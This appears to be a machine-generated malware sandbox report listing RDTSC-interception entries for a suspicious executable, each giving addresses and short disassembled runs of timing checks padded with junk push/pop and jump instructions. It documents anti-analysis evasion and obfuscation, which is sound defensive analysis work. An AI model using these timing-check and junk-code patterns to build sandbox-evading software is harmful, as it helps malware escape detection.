Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 168063E second address: 1680642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1680A16 second address: 1680A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 168138C second address: 1681394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16817FB second address: 1681820 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F96652499F6h 0x00000010 jmp 00007F9665249A05h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16867ED second address: 16867F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1686940 second address: 1686948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1686BEC second address: 1686BF2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1686BF2 second address: 1686BF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 168CAE8 second address: 168CB37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F9665989DB8h 0x00000010 jnp 00007F9665989DACh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F9665989DB2h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 168CFD1 second address: 168CFE2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnl 00007F96652499F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 168D159 second address: 168D169 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9665989DA6h 0x00000008 jno 00007F9665989DA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 168D169 second address: 168D178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F96652499FAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1692F88 second address: 1692F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F9665989DA6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1692F97 second address: 1692FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9665249A00h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1692FAD second address: 1692FC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB0h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1692FC3 second address: 1692FD8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F96652499F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1692FD8 second address: 1692FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16918E4 second address: 16918EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16918EA second address: 16918EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1691B87 second address: 1691BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665249A07h 0x00000009 jmp 00007F96652499FFh 0x0000000e popad 0x0000000f jmp 00007F9665249A01h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16922B5 second address: 16922F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F9665989DAEh 0x00000011 push edx 0x00000012 je 00007F9665989DA6h 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b jmp 00007F9665989DB8h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1692CF5 second address: 1692CFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1692CFB second address: 1692D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F9665989DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1692D05 second address: 1692D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1695646 second address: 16956A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F9665989DB9h 0x0000000c jmp 00007F9665989DB8h 0x00000011 pushad 0x00000012 jc 00007F9665989DA6h 0x00000018 ja 00007F9665989DA6h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 jng 00007F9665989DA8h 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 push ebx 0x00000032 jl 00007F9665989DA6h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1699009 second address: 1699012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A0508 second address: 16A050E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A050E second address: 16A0517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A0517 second address: 16A0521 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9665989DB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A0521 second address: 16A0557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F96652499F6h 0x0000000a jmp 00007F9665249A08h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F96652499FDh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A0557 second address: 16A055B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 169E94F second address: 169E955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 169E955 second address: 169E959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A654D second address: 16A656F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F96652499F6h 0x0000000a jmp 00007F9665249A08h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A975D second address: 16A977A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A977A second address: 16A9793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9665249A03h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A9793 second address: 16A97AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A97AD second address: 16A97B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F96652499F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A97B7 second address: 16A97C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F9665989DACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A98FC second address: 16A9902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A9A2C second address: 16A9A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A9B77 second address: 16A9B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F96652499F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A9B81 second address: 16A9B8E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9665989DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A9B8E second address: 16A9BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F96652499F6h 0x0000000a jmp 00007F9665249A04h 0x0000000f jbe 00007F96652499F6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A9BB3 second address: 16A9BCD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9665989DAEh 0x00000008 jnp 00007F9665989DA6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jng 00007F9665989DA6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A9BCD second address: 16A9BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A9BD1 second address: 16A9BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A9FB9 second address: 16A9FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A04h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F96652499FCh 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F96652499F8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16A9FEA second address: 16AA004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DB6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16AA004 second address: 16AA027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F96652499F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16AA027 second address: 16AA02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16AC596 second address: 16AC5AA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F96652499F6h 0x00000008 jmp 00007F96652499FAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16AC5AA second address: 16AC5C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB1h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F9665989DA6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B339D second address: 16B33D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96652499FFh 0x00000009 jmp 00007F9665249A02h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F96652499F6h 0x00000017 jnc 00007F96652499F6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B33D1 second address: 16B33D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B36DA second address: 16B36EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A00h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B36EE second address: 16B3713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F9665989DBCh 0x0000000c jmp 00007F9665989DB6h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B3B18 second address: 16B3B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B3B1E second address: 16B3B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B3B22 second address: 16B3B37 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F96652499FAh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B45C1 second address: 16B45C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B4D5E second address: 16B4D7C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9665249A05h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F96652499FDh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B4D7C second address: 16B4DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665989DB8h 0x00000009 pop esi 0x0000000a pushad 0x0000000b jp 00007F9665989DA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B4DA2 second address: 16B4DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16B7378 second address: 16B7397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F9665989DA6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15F5696 second address: 15F56A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F96652499F6h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15F56A4 second address: 15F56AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15F56AE second address: 15F56C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9665249A03h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15F56C8 second address: 15F56CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16BA5E7 second address: 16BA5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F96652499F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16BD25D second address: 16BD267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9665989DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16BD267 second address: 16BD28D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F96652499F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9665249A04h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F96652499F6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16BD52D second address: 16BD531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16CAD27 second address: 16CAD57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9665249A04h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9665249A02h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16CD565 second address: 16CD57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F9665989DB3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16CD57F second address: 16CD58B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F96652499F6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16CD58B second address: 16CD591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16CD591 second address: 16CD59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16CD71E second address: 16CD72A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jbe 00007F9665989DA6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16CD72A second address: 16CD736 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16CD736 second address: 16CD73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16DC45B second address: 16DC477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9665249A01h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16DC477 second address: 16DC48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665989DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E4A70 second address: 16E4A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F96652499F6h 0x0000000a je 00007F96652499F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E4A80 second address: 16E4A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E35FB second address: 16E3603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E4795 second address: 16E47BC instructions: 0x00000000 rdtsc 0x00000002 je 00007F9665989DAAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9665989DB3h 0x0000000f jns 00007F9665989DA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E6109 second address: 16E6134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F9665249A05h 0x0000000c pushad 0x0000000d jmp 00007F96652499FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E6134 second address: 16E613A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16E613A second address: 16E6156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c jl 00007F96652499F6h 0x00000012 popad 0x00000013 pushad 0x00000014 jg 00007F96652499F6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 172C875 second address: 172C8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9665989DB6h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F9665989DB0h 0x00000016 popad 0x00000017 jmp 00007F9665989DAAh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jg 00007F9665989DA6h 0x00000027 jmp 00007F9665989DB0h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 172C8CD second address: 172C8D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
